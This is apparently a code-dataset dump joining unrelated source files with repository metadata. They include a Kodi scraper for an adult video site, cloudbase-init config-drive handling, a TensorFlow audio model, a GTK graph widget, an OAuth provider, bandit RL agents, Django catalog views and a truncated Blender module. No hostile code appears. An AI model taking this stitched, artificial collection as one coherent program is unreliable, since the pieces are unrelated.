# data-vnfo='{"5d77de1e2d168":"\/cdn\/c9\/5v1n993kzs1n1f1ozc5b20zg1o350\/NCnvDdBfOQmJOivEflNSww\/1568229437\/05pbja75c39br5m8q41974z7haf\/v85edl7b76diej12eb2wd7136v8.vid
# https://www.sxyprn.com/cdn8/c9/5v1n993kzs1n1f1ozc5b20zg1o350/NCnvDdBfOQmJOivEflNSww/1568229300/05pbja75c39br5m8q41974z7haf/v85edl7b76diej12eb2wd7136v8.vid
# -106
# data-vnfo='{"5d77de1e2d168":"\/cdn\/c9\/41v9b3nzc1q1615zr5n2szw153905\/9LeO2lux-GrgOaEPfMONcA\/1568230473\/1d52b3aa5s36bt5d8o4a9m427pa\/zh5sdc7k7ndee11qe42sdz1h6j8.vid
# https://www.sxyprn.com/cdn8/c9/41v9b3nzc1q1615zr5n2szw153905/9LeO2lux-GrgOaEPfMONcA/1568230367/1d52b3aa5s36bt5d8o4a9m427pa/zh5sdc7k7ndee11qe42sdz1h6j8.vid
# https://c9.trafficdeposit.com/vidi/m1v963ez51m1u11za5u2xz41e3806/BQFIcJlTMr0-Z1gVUTxgaQ/1568228490/5ba53b584947a/5d77de1e2d168.vid
# https://c9.trafficdeposit.com/vidi/e1y9b3mzc1o101lzg5q2cze1j390h/kK-CN4l73_EeBhkoYNYA2A/1568228307/5ba53b584947a/5d77de1e2d168.vid
# 193111152130
# https://c9.trafficdeposit.com/vidi/5v1n993kzs1n1f1ozc5b20zg1o350/NCnvDdBfOQmJOivEflNSww/1568229300/5ba53b584947a/5d77de1e2d168.vid
# https://c9.trafficdeposit.com/vidi/m1v963ez51m1u11za5u2xz41e3806/NCnvDdBfOQmJOivEflNSww/1568229300/5ba53b584947a/5d77de1e2d168.vid
def play(item):
itemlist = []
data = httptools.downloadpage(item.url).data
data = re.sub(r"\n|\r|\t|amp;|\s{2}| ", "", data)
url = scrapertools.find_single_match(data, 'data-vnfo=.*?":"([^"]+)"')
url = url.replace("\/", "/").replace("/cdn/", "/cdn8/")
url = urlparse.urljoin(item.url,url)
itemlist = servertools.find_video_items(item.clone(url = url, contentTitle = item.title))
# itemlist.append( Item(channel=item.channel, action="play",server=directo, title = item.title, url=url))
return itemlist
|
gpl-3.0
| 4,249,873,821,578,241,500
| 55.082645
| 167
| 0.620395
| false
| 2.770927
| false
| false
| false
|
cmin764/cloudbase-init
|
cloudbaseinit/metadata/services/osconfigdrive/windows.py
|
1
|
8485
|
# Copyright 2012 Cloudbase Solutions Srl
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import itertools
import os
import shutil
import struct
import tempfile
import uuid
from oslo_config import cfg
from oslo_log import log as oslo_logging
from cloudbaseinit import exception
from cloudbaseinit.metadata.services.osconfigdrive import base
from cloudbaseinit.osutils import factory as osutils_factory
from cloudbaseinit.utils.windows import disk
from cloudbaseinit.utils.windows import vfat
opts = [
cfg.StrOpt('bsdtar_path', default='bsdtar.exe',
help='Path to "bsdtar", used to extract ISO ConfigDrive '
'files'),
]
CONF = cfg.CONF
CONF.register_opts(opts)
LOG = oslo_logging.getLogger(__name__)
CONFIG_DRIVE_LABEL = 'config-2'
MAX_SECTOR_SIZE = 4096
# Absolute offset values and the ISO magic string.
OFFSET_BOOT_RECORD = 0x8000
OFFSET_ISO_ID = OFFSET_BOOT_RECORD + 1
ISO_ID = b'CD001'
# Little-endian unsigned short size values.
OFFSET_VOLUME_SIZE = OFFSET_BOOT_RECORD + 80
OFFSET_BLOCK_SIZE = OFFSET_BOOT_RECORD + 128
PEEK_SIZE = 2
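# Hedged illustration, not part of the original module: the same header fields
# can be read from a plain ISO file on disk using the offsets above. The real
# code below reads them from a raw disk/partition device instead; the `path`
# argument here is hypothetical.
def _example_iso_image_size(path):
    with open(path, 'rb') as stream:
        stream.seek(OFFSET_ISO_ID)
        if stream.read(len(ISO_ID)) != ISO_ID:
            return None  # not an ISO9660 image
        stream.seek(OFFSET_VOLUME_SIZE)
        volume_size = struct.unpack("<H", stream.read(PEEK_SIZE))[0]
        stream.seek(OFFSET_BLOCK_SIZE)
        block_size = struct.unpack("<H", stream.read(PEEK_SIZE))[0]
        return volume_size * block_size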
class WindowsConfigDriveManager(base.BaseConfigDriveManager):
def __init__(self):
super(WindowsConfigDriveManager, self).__init__()
self._osutils = osutils_factory.get_os_utils()
def _check_for_config_drive(self, drive):
label = self._osutils.get_volume_label(drive)
if label and label.lower() == CONFIG_DRIVE_LABEL and \
os.path.exists(os.path.join(drive,
'openstack\\latest\\'
'meta_data.json')):
LOG.info('Config Drive found on %s', drive)
return True
return False
def _get_iso_file_size(self, device):
if not device.fixed:
return None
if not device.size > (OFFSET_BLOCK_SIZE + PEEK_SIZE):
return None
off = device.seek(OFFSET_ISO_ID)
magic = device.read(len(ISO_ID), skip=OFFSET_ISO_ID - off)
if ISO_ID != magic:
return None
off = device.seek(OFFSET_VOLUME_SIZE)
volume_size_bytes = device.read(PEEK_SIZE,
skip=OFFSET_VOLUME_SIZE - off)
off = device.seek(OFFSET_BLOCK_SIZE)
block_size_bytes = device.read(PEEK_SIZE,
skip=OFFSET_BLOCK_SIZE - off)
volume_size = struct.unpack("<H", volume_size_bytes)[0]
block_size = struct.unpack("<H", block_size_bytes)[0]
return volume_size * block_size
def _write_iso_file(self, device, iso_file_path, iso_file_size):
with open(iso_file_path, 'wb') as stream:
offset = 0
# Read multiples of the sector size bytes
# until the entire ISO content is written.
while offset < iso_file_size:
real_offset = device.seek(offset)
bytes_to_read = min(MAX_SECTOR_SIZE, iso_file_size - offset)
data = device.read(bytes_to_read, skip=offset - real_offset)
stream.write(data)
offset += bytes_to_read
def _extract_files_from_iso(self, iso_file_path):
args = [CONF.bsdtar_path, '-xf', iso_file_path,
'-C', self.target_path]
(out, err, exit_code) = self._osutils.execute_process(args, False)
if exit_code:
raise exception.CloudbaseInitException(
'Failed to execute "bsdtar" from path "%(bsdtar_path)s" with '
'exit code: %(exit_code)s\n%(out)s\n%(err)s' % {
'bsdtar_path': CONF.bsdtar_path,
'exit_code': exit_code,
'out': out, 'err': err})
def _extract_iso_from_devices(self, devices):
"""Search across multiple devices for a raw ISO."""
extracted = False
iso_file_path = os.path.join(tempfile.gettempdir(),
str(uuid.uuid4()) + '.iso')
for device in devices:
try:
with device:
iso_file_size = self._get_iso_file_size(device)
if iso_file_size:
LOG.info('ISO9660 disk found on %s', device)
self._write_iso_file(device, iso_file_path,
iso_file_size)
self._extract_files_from_iso(iso_file_path)
extracted = True
break
except Exception as exc:
LOG.warning('ISO extraction failed on %(device)s with '
'%(error)r', {"device": device, "error": exc})
if os.path.isfile(iso_file_path):
os.remove(iso_file_path)
return extracted
def _get_config_drive_from_cdrom_drive(self):
for drive_letter in self._osutils.get_cdrom_drives():
if self._check_for_config_drive(drive_letter):
os.rmdir(self.target_path)
shutil.copytree(drive_letter, self.target_path)
return True
return False
def _get_config_drive_from_raw_hdd(self):
disks = map(disk.Disk, self._osutils.get_physical_disks())
return self._extract_iso_from_devices(disks)
def _get_config_drive_from_vfat(self):
for drive_path in self._osutils.get_physical_disks():
if vfat.is_vfat_drive(self._osutils, drive_path):
LOG.info('Config Drive found on disk %r', drive_path)
vfat.copy_from_vfat_drive(self._osutils, drive_path,
self.target_path)
return True
return False
def _get_config_drive_from_partition(self):
for disk_path in self._osutils.get_physical_disks():
physical_drive = disk.Disk(disk_path)
with physical_drive:
partitions = physical_drive.partitions()
extracted = self._extract_iso_from_devices(partitions)
if extracted:
return True
return False
def _get_config_drive_from_volume(self):
"""Look through all the volumes for config drive."""
volumes = self._osutils.get_volumes()
for volume in volumes:
if self._check_for_config_drive(volume):
os.rmdir(self.target_path)
shutil.copytree(volume, self.target_path)
return True
return False
def _get_config_drive_files(self, cd_type, cd_location):
get_config_drive = self.config_drive_type_location.get(
"{}_{}".format(cd_location, cd_type))
if get_config_drive:
return get_config_drive()
else:
LOG.debug("Irrelevant type %(type)s in %(location)s location; "
"skip",
{"type": cd_type, "location": cd_location})
return False
def get_config_drive_files(self, searched_types=None,
searched_locations=None):
searched_types = searched_types or []
searched_locations = searched_locations or []
for cd_type, cd_location in itertools.product(searched_types,
searched_locations):
LOG.debug('Looking for Config Drive %(type)s in %(location)s',
{"type": cd_type, "location": cd_location})
if self._get_config_drive_files(cd_type, cd_location):
return True
return False
@property
def config_drive_type_location(self):
return {
"cdrom_iso": self._get_config_drive_from_cdrom_drive,
"hdd_iso": self._get_config_drive_from_raw_hdd,
"hdd_vfat": self._get_config_drive_from_vfat,
"partition_iso": self._get_config_drive_from_partition,
"partition_vfat": self._get_config_drive_from_volume,
}
|
apache-2.0
| -5,127,092,252,806,962,000
| 37.568182
| 78
| 0.576429
| false
| 3.941013
| true
| false
| false
|
WhatDo/FlowFairy
|
examples/sine_fix/gglu_nopool.py
|
1
|
3674
|
import tensorflow as tf
import tensorflow.contrib.slim as slim
from flowfairy.conf import settings
from util import lrelu, conv2d, maxpool2d, embedding, avgpool2d, GLU, causal_GLU
from functools import partial
import ops
discrete_class = settings.DISCRETE_CLASS
batch_size = settings.BATCH_SIZE
samplerate = sr = settings.SAMPLERATE
dropout = settings.DROPOUT
learning_rate = settings.LEARNING_RATE
embedding_size = settings.EMBEDDING_SIZE
num_classes = settings.CLASS_COUNT
def broadcast(l, emb):
sh = l.get_shape().as_list()[1]
emb = emb[:, None, None, :]
emb = tf.tile(emb, (1,sh,1,1))
return tf.concat([l, emb], 3)
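# Hedged shape sketch, not part of the original source: broadcast() tiles the
# per-example embedding along the time axis and appends it as extra channels.
# A numpy equivalent with assumed example sizes:
def _example_broadcast_shapes():
    import numpy as np
    l = np.zeros((2, 16000, 1, 4))   # (batch, samples, 1, channels)
    emb = np.zeros((2, 8))           # (batch, embedding_size)
    tiled = np.tile(emb[:, None, None, :], (1, l.shape[1], 1, 1))
    out = np.concatenate([l, tiled], axis=3)
    assert out.shape == (2, 16000, 1, 12)
    return out.shape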
# Create model
def conv_net(x, cls, dropout, is_training=False):
xs = tf.expand_dims(x, -1)
xs = tf.expand_dims(xs, -1)
conv1 = causal_GLU(xs, 4, [256, 1], scope='conv1_1', normalizer_fn=slim.batch_norm, normalizer_params={'is_training': is_training, 'decay': 0.9})
conv1 = GLU(conv1, 4, [256, 1], scope='conv1_2')
#pool1 = slim.max_pool2d(conv1, [2,1])
print('conv1: ', conv1)
#with tf.name_scope('embedding'):
with tf.variable_scope('embedding'):
emb1 = embedding(cls, embedding_size, num_classes)
embedded = broadcast(conv1, emb1)
print('embedded:', embedded)
#convblock 2
conv2 = GLU(embedded, 8, [256, 1], scope='conv2_1')
conv2 = GLU(conv2, 8, [256, 1], scope='conv2_2')
#pool2 = slim.max_pool2d(conv2, [2,1])
print('conv2: ', conv2)
#convblock 3
conv3 = GLU(conv2, 16, [256, 1], scope='conv3_1')
conv3 = GLU(conv3, 16, [256, 1], scope='conv3_2')
print('conv3: ', conv3)
#convblock 4
#conv4 = tf.depth_to_space(conv3, 4) #upconv
#print('d2sp: ', conv4)
#conv4 = tf.reshape(conv4, shape=[-1, sr, 1, 4]) # reshape upconvolution to have proper shape
conv4 = GLU(conv3, 16, [256, 1], scope='conv4_1')
conv4 = GLU(conv4, 16, [256, 1], scope='conv4_2')
print('conv4: ', conv4)
#convblock 5
conv5 = tf.concat([conv4, conv1], 3) # <- unet like concat first with last
conv5 = GLU(conv5, 16, [256, 1], scope='conv5')
conv5 = GLU(conv5, discrete_class, [2,1], scope='out')
print('conv5: ', conv5)
#out
out = tf.reshape(conv5, [-1, sr, discrete_class])
print('out: ', out)
return out
class Net:
def __init__(self):
pass
def feedforward(self, x, y, frqid, frqid2, is_training=False):
pred = conv_net(x, frqid, None, is_training)
target_output = tf.reshape(y,[-1])
prediction = tf.reshape(pred,[-1, discrete_class])
# Define loss and optimizer
cost = tf.losses.sparse_softmax_cross_entropy(logits = prediction,
labels = target_output,
scope='xentropy')
correct_pred = tf.equal(tf.argmax(pred, 2), y)
with tf.name_scope('accuracy'):
accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
return pred, cost, accuracy
def train(self, **kwargs):
self.train_x = kwargs['x']
self.train_y = kwargs['y']
self.train_pred, self.train_cost, self.train_acc = self.feedforward(is_training=True, **kwargs)
self.optimizer = ops.train()
def validation(self, **kwargs):
self.val_x = kwargs['x']
self.val_y = kwargs['y']
self.val_pred, self.val_cost, self.val_acc = self.feedforward(**kwargs)
self.val_pred = tf.Print(self.val_pred, [kwargs['frqid'], kwargs['frqid2']], message='frqids: ')
def begin(self, session):
#session.run(self.init)
pass
def should_stop(self):
return False
|
mit
| 6,973,295,967,363,852,000
| 31.803571
| 149
| 0.605335
| false
| 3.06934
| false
| false
| false
|
inguma/bokken
|
ui/graph.py
|
1
|
6901
|
# graph.py
#
# Copyright 2011 Hugo Teso <hugo.teso@gmail.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
from gi.repository import Gtk
from gi.repository import GObject
from PIL import Image
import os, tempfile
from subprocess import *
import ui.mydot_widget as mydot_widget
import graph_bar
class MyDotWidget(Gtk.HBox):
'''Working'''
def __init__(self, core, main):
self.uicore = core
self.main = main
self.last_fcn = ''
#dotcode = self.uicore.get_callgraph()
#GObject.GObject.__init__(self, False, 1)
# MEOW
GObject.GObject.__init__(self)
self.side_vb = Gtk.VBox(False, 1)
self.side_hb = Gtk.HBox(False, 1)
#self.dot_widget = DotWidget()
self.dot_widget = mydot_widget.MyDotWidget(self.uicore, self.main)
self.create_tree()
self.create_preview()
self.pack_start(self.dot_widget, True, True, 0)
self.bar = graph_bar.GraphBar(self.dot_widget, self, self.uicore)
#self.pack_start(self.bar, False, False, 0)
self.side_hb.pack_start(self.bar, False, False, 1)
if self.uicore.backend == 'radare':
self.pack_start(self.side_vb, False, False, 1)
self.side_hb.pack_start(self.sw, True, True, 1)
self.side_vb.pack_start(self.side_hb, True, True, 1)
self.side_vb.pack_start(self.preview, False, False, 0)
def set_dot(self, dotcode):
dotcode = dotcode.replace('overlap="scale", bgcolor="#475672"', 'overlap="scale", bgcolor="invis"')
dotcode = dotcode.replace('color=azure3, fontcolor=white, fillcolor="#373D49"', 'color=blue, fontcolor="#666666", fillcolor=white')
dotcode = dotcode.replace('fillcolor="#5E82C6"', 'fillcolor="white", color=green')
dotcode = dotcode.replace('color=lightgray, style=filled,', 'color=blue')
dotcode = dotcode.replace('color="lightgray"', 'color="blue"')
dotcode = dotcode.replace('len=1.25, color=azure3', 'len=1.25, color=blue')
dotcode = dotcode.replace('color=lightgray', 'color=lightgray, bgcolor=white')
dotcode = dotcode.replace('color="green"', 'color="green", fontname="Courier", fontsize="8"')
self.dot_widget.set_dotcode(dotcode)
self.generate_thumbnail(dotcode)
if self.uicore.backend == 'radare':
self.nodes = {}
function = ''
for node in self.dot_widget.graph.nodes:
function = ''
if node.url:
function, node_name = node.url.split('/')
self.nodes[node_name] = [node.x, node.y]
if function:
self.update_tree(function)
self.dot_widget.on_zoom_100(None)
# Navigate to first node
if self.uicore.backend == 'radare':
if len(self.nodes) > 1:
node = self.nodes.keys()[0]
self.dot_widget.animate_to(int(self.nodes[node][0]), int(self.nodes[node][1]))
def generate_thumbnail(self, dotcode):
#size = self.tree.allocation.width
size = self.side_hb.get_allocated_width()
tmp_dot = tempfile.NamedTemporaryFile(delete = False)
tmp_dot.write(dotcode)
tmp_dot.close()
cmd = "dot -Tpng " + tmp_dot.name + " > " + tmp_dot.name + ".png"
os.system(cmd)
im = Image.open(tmp_dot.name + ".png")
im.convert('RGBA')
im.thumbnail([size,size], Image.ANTIALIAS)
#im.save(tmp_dot.name + ".png.thumbnail", "JPEG")
# Add white backgound as image is transparent
offset_tuple = (im.size[0], im.size[1])
final_thumb = Image.new(mode='RGBA',size=offset_tuple, color=(255,255,255,0))
final_thumb.paste(im)
final_thumb.save(tmp_dot.name + ".png.thumbnail", "PNG")
self.fill_preview(tmp_dot.name + ".png.thumbnail")
os.remove(tmp_dot.name)
os.remove(tmp_dot.name + ".png")
os.remove(tmp_dot.name + ".png.thumbnail")
def create_preview(self):
# Create Image window for graph preview
self.preview = Gtk.Image()
self.preview.show()
def fill_preview(self, path):
self.preview.set_from_file(path)
def create_tree(self):
# Scrolled Window
self.sw = Gtk.ScrolledWindow()
self.sw.set_shadow_type(Gtk.ShadowType.ETCHED_IN)
self.sw.set_policy(Gtk.PolicyType.NEVER, Gtk.PolicyType.AUTOMATIC)
self.store = Gtk.ListStore(str, str)
self.tree = Gtk.TreeView(self.store)
self.sw.add(self.tree)
self.tree.set_rules_hint(True)
# Connect right click popup search menu
self.popup_handler = self.tree.connect('button-press-event', self.popup_menu)
# Create the column
bblocks = Gtk.TreeViewColumn()
bblocks.set_title("Basic Blocks")
cell = Gtk.CellRendererText()
bblocks.pack_start(cell, True)
bblocks.add_attribute(cell, "text", 0)
self.treestore = Gtk.TreeStore(str)
# Add column to tree
self.tree.append_column(bblocks)
self.tree.set_model(self.treestore)
self.tree.expand_all()
def update_tree(self, function):
# Clear contents
self.treestore.clear()
# Iterate bb and add to the tree
it = self.treestore.append(None, [function])
nodes = self.nodes.keys()
nodes.sort()
for element in nodes:
self.treestore.append(it, [element])
self.tree.set_model(self.treestore)
self.tree.expand_all()
def popup_menu(self, tree, event):
if event.button == 1:
coordinates = tree.get_path_at_pos(int(event.x), int(event.y))
# Get the information about the click.
# coordinates is None if the click is outside the rows but inside
# the widget.
if not coordinates:
return False
(path, column, x, y) = coordinates
if len(path) == 2 and self.nodes:
node = self.treestore[path][0]
self.dot_widget.animate_to(int(self.nodes[node][0]), int(self.nodes[node][1]))
|
gpl-2.0
| 5,638,959,716,393,014,000
| 37.769663
| 139
| 0.605564
| false
| 3.528119
| false
| false
| false
|
maurodoglio/taarweb
|
taarweb/users/provider.py
|
1
|
1486
|
from allauth.socialaccount.app_settings import QUERY_EMAIL
from allauth.socialaccount.providers.google.provider import (GoogleAccount,
GoogleProvider,
Scope)
class TaarGoogleAccount(GoogleAccount):
def get_profile_url(self):
"""
The profile URL field is called 'profile' for OpenIDConnect profiles,
see https://developers.google.com/+/web/api/rest/openidconnect/getOpenIdConnect
"""
return self.account.extra_data.get('profile')
class TaarGoogleProvider(GoogleProvider):
def extract_uid(self, data):
return str(data['sub'])
def get_default_scope(self):
"Override the default method to prepend 'openid' and add specific order"
scope = ['openid']
if QUERY_EMAIL:
scope.append(Scope.EMAIL)
scope.append(Scope.PROFILE)
return scope
def get_hosted_domain(self):
"If configured returns the Google Apps domain"
return self.get_settings().get('HOSTED_DOMAIN', None)
def get_auth_params(self, request, action):
"If configured, adds the hosted domain to the auth request"
params = super().get_auth_params(request, action)
hosted_domain = self.get_hosted_domain()
if hosted_domain is not None:
params['hd'] = hosted_domain
return params
provider_classes = [TaarGoogleProvider]
|
mpl-2.0
| -2,247,812,986,946,630,000
| 34.380952
| 87
| 0.617766
| false
| 4.435821
| false
| false
| false
|
dmanev/ArchExtractor
|
ArchExtractor/umlgen/Specific/STK/StkParser/StkJilFileCriteria/StkJilDataCriteria.py
|
1
|
2829
|
import re
import PortInterface.ProvidedPort
import PortInterface.RequiredPort
import PortInterface.SenderReceiverInterface
import Datatype.ArrayDataType
import PortInterface.DataElement
import StkParser.StkPortCriteria
import Components.IComponent
import Parser.IPortCriteria
class StkJilDataCriteria(StkParser.StkPortCriteria.StkPortCriteria):
"""STK JIL file data access criteria"""
def execute(self, inpTextContent, inoutIComponent):
## Bouml preserved body begin 0003536F
if re.search(r'Data\s+(\w+)', inpTextContent):
nextItemIsDataConfig = 0
dataName = None
for item in re.split(r'(Data\s+\w+)', inpTextContent):
nameMatchObj = re.search(r'Data\s+(\w+)', item)
if nameMatchObj:
nextItemIsDataConfig = 1
dataName = nameMatchObj.group(1)
elif nextItemIsDataConfig:
nextItemIsDataConfig = 0
dataProps = self.extractLevelOneBlock(item)
if dataProps:
dataType, hasArray = re.findall(r'\s*Type\s*=\s*([US]\d+)(Array|)',
dataProps, re.I)[0]
dtf = self.getDataTypeFactory()
DT = dtf.getDataType(dataType)
DE = PortInterface.DataElement.DataElement()
DE.setName(dataName)
if hasArray:
arrayProps = self.extractLevelOneBlock(dataProps)
arraySize = re.findall(r'\s*Size\s*=\s*(\d+)',
arrayProps, re.I)[0]
arrayDT = dtf.getArrayDataType('Arr'+arraySize+dataType)
arrayDT.itsDataType = DT
arrayDT.setMaxNumberOfElements(arraySize)
DE.itsDataType = arrayDT
else:
DE.itsDataType = DT
pif = self.getPortInterfaceFactory()
sendRecvIf = pif.getSenderReceiverIf(dataName, [DE])
provPortSetter = PortInterface.ProvidedPort.ProvidedPort(sendRecvIf)
provPortSetter.setName("set"+dataName)
provPortGetter = PortInterface.ProvidedPort.ProvidedPort(sendRecvIf)
provPortGetter.setName("get"+dataName)
inoutIComponent.addPort(provPortSetter)
inoutIComponent.addPort(provPortGetter)
return inoutIComponent
## Bouml preserved body end 0003536F
def __init__(self):
super(StkJilDataCriteria, self).__init__()
pass
|
gpl-3.0
| 6,982,030,154,229,971,000
| 47.775862
| 92
| 0.537292
| false
| 4.570275
| false
| false
| false
|
andreweskeclarke/reinforcement_learning
|
src/agents.py
|
1
|
5084
|
import math
import random
class Agent:
def __init__(self, actions, options={}):
self.rgen = random.SystemRandom() # cryptographically secure, unlike random
self.actions = actions
self.last_action = None
def __choose_exploitative_action__(self):
raise Exception('Not implemented!')
def __choose_exploratory_action__(self):
raise Exception('Not implemented!')
def __should_exploit__(self):
raise Exception('Not implemented!')
def __update__(self, reward, state=None):
raise Exception('Not implemented!')
def choose(self):
if self.__should_exploit__():
self.last_action = self.__choose_exploitative_action__()
else:
self.last_action = self.__choose_exploratory_action__()
return self.last_action
def update(self, reward, state=None):
        self.__update__(reward, state=state)
class EGreedyAgent(Agent):
def __init__(self, actions, options={}):
super(EGreedyAgent, self).__init__(actions, options)
use_optimistic = 'optimistic' in options and options['optimistic']
initial_reward = 5 if use_optimistic else 0
        self.avg_rewards = [initial_reward for a in self.actions]
self.n_observations = [0 for a in self.actions]
self.epsilon = options['epsilon']
def __choose_exploitative_action__(self):
return self.avg_rewards.index(max(self.avg_rewards))
def __choose_exploratory_action__(self):
return self.rgen.choice(self.actions)
def __should_exploit__(self):
return self.rgen.random() < (1 - self.epsilon)
def __update__(self, reward, state=None):
last_action = self.last_action
avg = self.avg_rewards[last_action]
self.n_observations[last_action] += 1
self.avg_rewards[last_action] = avg + (reward - avg)/self.n_observations[last_action]
def softmax_choice(rgen, actions, action_prefs):
choice = rgen.random()
cumulative_probability = 1
softmax_denominator = sum([math.exp(p) for p in action_prefs])
for a in actions:
softmax_a = math.exp(action_prefs[a]) / softmax_denominator
cumulative_probability = cumulative_probability - softmax_a
if cumulative_probability <= choice:
return a
assert(False)
def discrete_choice(rgen, actions, action_prefs):
choice = rgen.random()
cumulative_probability = 1
for a in actions:
cumulative_probability = cumulative_probability - action_prefs[a]
if cumulative_probability <= choice:
return a
assert(False)
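# Hedged usage sketch, not part of the original module: drawing actions with
# the helpers above. Actions are plain indices into the preference list; the
# concrete preference values are made up for illustration.
def _example_choices():
    rgen = random.SystemRandom()
    actions = [0, 1, 2]
    a = softmax_choice(rgen, actions, [0.1, 2.0, 0.5])   # softmax over preferences
    b = discrete_choice(rgen, actions, [0.2, 0.3, 0.5])  # explicit probabilities
    return a, b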
class EGreedySoftmaxAgent(EGreedyAgent):
def __choose_exploratory_action__(self):
return softmax_choice(self.rgen, self.actions, self.avg_rewards)
class ReinforcementComparisonAgent(Agent):
def __init__(self, actions, options={}):
super(ReinforcementComparisonAgent, self).__init__(actions, options)
self.action_preferences = [0 for a in self.actions]
self.alpha = options['alpha']
self.beta = options['beta']
self.reference_reward = 0
self.last_action = None
def __choose_exploitative_action__(self):
        raise Exception('Unreachable code was reached!')
def __choose_exploratory_action__(self):
return softmax_choice(self.rgen, self.actions, self.action_preferences)
def __should_exploit__(self):
return False
def __update__(self, reward, state=None):
old_pref = self.action_preferences[self.last_action]
self.action_preferences[self.last_action] = old_pref + self.beta * (reward - self.reference_reward)
self.reference_reward = self.reference_reward + self.alpha * (reward - self.reference_reward)
class PursuitAgent(Agent):
def __init__(self, actions, options={}):
super(PursuitAgent, self).__init__(actions, options)
use_optimistic = 'optimistic' in options and options['optimistic']
initial_reward = 5 if use_optimistic else 0
        self.avg_rewards = [initial_reward for a in self.actions]
self.n_observations = [0 for a in self.actions]
self.action_probs = [1.0/len(self.actions) for a in self.actions]
self.beta = options['beta']
def __choose_exploitative_action__(self):
        raise Exception('Unreachable code was reached!')
def __choose_exploratory_action__(self):
return discrete_choice(self.rgen, self.actions, self.action_probs)
def __should_exploit__(self):
return False
def __update__(self, reward, state=None):
last_action = self.last_action
avg = self.avg_rewards[last_action]
self.n_observations[last_action] += 1
self.avg_rewards[last_action] = avg + (reward - avg)/self.n_observations[last_action]
max_index = self.avg_rewards.index(max(self.avg_rewards))
for i in range(0, len(self.action_probs)):
prob = self.action_probs[i]
if i != max_index:
self.action_probs[i] = prob + (self.beta * (0 - prob))
else:
self.action_probs[i] = prob + (self.beta * (1 - prob))
|
mit
| -68,055,493,988,964,190
| 35.84058
| 107
| 0.635917
| false
| 3.765926
| false
| false
| false
|
escsun/radio-shop
|
catalog/views.py
|
1
|
1793
|
from django.shortcuts import render, get_object_or_404
from .models import Category, Product, Value
from django.contrib import messages
from django.core.paginator import Paginator, PageNotAnInteger, EmptyPage
from django.core.exceptions import ObjectDoesNotExist
from cart.forms import CartAddProductForm
def catalog_index(request, id=None):
categories = Category.objects.filter(parent_id=id)
try:
category = Category.objects.get(id=id)
except ObjectDoesNotExist:
category = Category.objects.none()
if not categories:
products_list = Product.objects.filter(category_id=id, is_available=True)
paginator = Paginator(products_list, per_page=25)
page = request.GET.get('page')
cart_product_form = CartAddProductForm()
try:
products = paginator.page(page)
except PageNotAnInteger:
products = paginator.page(1)
except EmptyPage:
products = paginator.page(paginator.num_pages)
if not products:
messages.error(request, "В данной категории товаров нет")
return render(request, 'catalog_products.html', {
"products": products,
"category": category,
"cart_product_form": cart_product_form
})
response = render(request, 'catalog_base.html', {
"categories": categories,
"category": category
})
return response
def catalog_product_detail(request, id):
product = Product.objects.get(id=id)
category = Category.objects.get(id=product.category.id)
values = Value.objects.filter(product_id=id)
return render(request, 'catalog_product_detail.html', {
"product": product,
"values": values,
"category": category
})
|
gpl-3.0
| 3,052,322,435,605,630,000
| 34.36
| 81
| 0.664969
| false
| 4.015909
| false
| false
| false
|
niacdoial/blemd
|
pseudobones.py
|
1
|
21031
|
from mathutils import Vector, Euler, Matrix
import bpy
import math
import re
from .common import dict_get_set
from . import common
from .Matrix44 import rotation_part
# import weakref
import logging
log = logging.getLogger('bpy.ops.import_mesh.bmd.pseudobones')
NtoB = Matrix([[1,0,0,0],
[0,0,-1,0],
[0,1,0,0],
[0,0,0,1]])
BtoN = Matrix([[1,0,0,0],
[0,0,1,0],
[0,-1,0,0],
[0,0,0,1]])
def product(lamb, vct):
ret = vct.copy()
ret.x *= lamb
ret.y *= lamb
ret.z *= lamb
return ret
def sum2(vct1, vct2):
ret = vct1.copy()
ret.x += vct2.x
ret.y += vct2.y
ret.z += vct2.z
return ret
def subtract2(vct1, vct2):
ret = vct1.copy()
ret.x -= vct2.x
ret.y -= vct2.y
ret.z -= vct2.z
return ret
def vect_normalize(vect):
length = math.sqrt(vect.x**2 + vect.y**2 + vect.z**2)
if length < .01:
log.error('Vector to be normalized is near zero. Returning (0,0,1) to avoid crashes')
return Vector((0,0,1))
tempv = vect
tempv.x /= length
tempv.y /= length
tempv.z /= length
return tempv
def cubic_interpolator(t1, y1, d1, t2, y2, d2, t):
if -0.001 < t2-t1 < 0.001:
        log.warning('cannot interpolate between almost identical times')
        return (y1+y2) / 2, 0, 0
tn = (t-t1)/(t2-t1) # normalized time coordinate
d1 *= (t2-t1) # adapted derivatives for the normalized time interval
d2 *= (t2-t1)
# temporary values
# for the value
ya = (2*tn**3 - 3*tn**2 + 1)*y1
yb = (tn**3 - 2*tn**2 + tn)*d1
yc = (-2*tn**3 + 3*tn**2)*y2
yd = (tn**3 - tn**2)*d2
# and the tangent (will have to be corrected since d(a(b))=d(b)*d(a)(b))
da = (6*tn**2 - 6*tn) * y1
db = (3*tn**2 - 4*tn + 1) * d1
dc = (-6*tn**2 + 6*tn) * y2
dd = (3*tn**2 - 2*tn) * d2
y = ya+yb+yc+yd
d = (da+db+dc+dd)/(t2-t1)
return y, d, d
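# Hedged endpoint check, not part of the original add-on: the Hermite
# interpolation above reproduces the keyframe values at the interval bounds.
def _example_cubic_endpoints():
    y0, _, _ = cubic_interpolator(0.0, 1.0, 0.0, 10.0, 3.0, 0.0, 0.0)
    y1, _, _ = cubic_interpolator(0.0, 1.0, 0.0, 10.0, 3.0, 0.0, 10.0)
    assert abs(y0 - 1.0) < 1e-6 and abs(y1 - 3.0) < 1e-6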
###
# the goal here is to get the matrix adapted to blender animation
# (from default pose to correct pose)
# in blender, the matrix chain looks like
